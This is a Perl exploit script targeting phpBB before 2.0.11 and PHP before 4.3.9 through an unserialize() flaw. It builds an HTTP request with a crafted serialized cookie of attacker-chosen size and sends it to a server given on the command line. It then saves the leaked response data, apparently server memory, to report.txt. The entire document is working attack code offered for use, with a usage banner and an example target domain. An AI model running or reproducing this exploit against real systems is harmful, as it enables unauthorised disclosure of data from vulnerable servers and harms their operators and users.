#!/usr/bin/perl
#Phpbb < 2.011 &php < 4.39 unserialize () exploit
#Code by Alpha(netsh@163.com)
#qq:24266683
#Welcom To Http://www.cnwill.com/

use IO::Socket;

system('cls'); 

if (@ARGV != 5) { 
print "\n";
print "*****************************************************\n";
print "Thanks use this programme\n";
print "This is Phpbb < 2.011 &php < 4.39 unserialize () exploit.\n\n";
print "Use£º\n$0 host port path buffersize cooike\n\n";
print "e.g :\n$0 www.*.org.cn 80 /html/forum/ 30000 phpbb2mysql\n\n";
print "Code by Alpha\n";
print "*****************************************************\n"; 
exit(1); 
} 

$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[2];
$size = @ARGV[3];
$cookie=@ARGV[4];
 
#$host="www.cosoft.org.cn";

$req = "GET $path HTTP/1.1\n".
	"Host: $host\n".
	"Cookie: $cookie"."_data=s:$size:%22test1%22%3b; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=$host\n".
	"Cookie: $cookie"."_sid=1cfd759c33ba2a45b994c7b7cfd948ec; path=/; domain=$host\n".
	"Accept-Language: fr\n".
	"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n".
	"Connection: close\n\n";


#print "$req";

#exit;
print "######Waitting...........\n\n";
@res = &connect;

$aaa =join ('',@res);

$aaa=substr ($aaa,360, 2*$size);

$aaa=~s/%../\./g;
$aaa=~s/\.\.\.\./\./g;
$aaa=~s/\.\.\./\./g;
$aaa=~s/\.\.\./\./g;
$aaa=~s/\.\./\./g;
$aaa=~s/\.\./\./g;
$aaa=~s/\..\../\n/g;
$aaa=~s/\n\n/\n/g;
$aaa=~s/\n\n/\n/g;

open(file,">>report.txt");
print file $aaa;
close(file);
# because the result is not small,so I put it in a file
print "ok,the result is in the report.txt,you can see it now!\n\n";
print "*****************************************************\n";


sub connect {
my $connection = IO::Socket::INET->new(Proto =>"tcp",
                                PeerAddr =>$host,
                                PeerPort =>$port) || die "Sorry! Could not connect to $host \n";

print $connection $req;

my @res = <$connection>; 
close $connection;
return @res;
}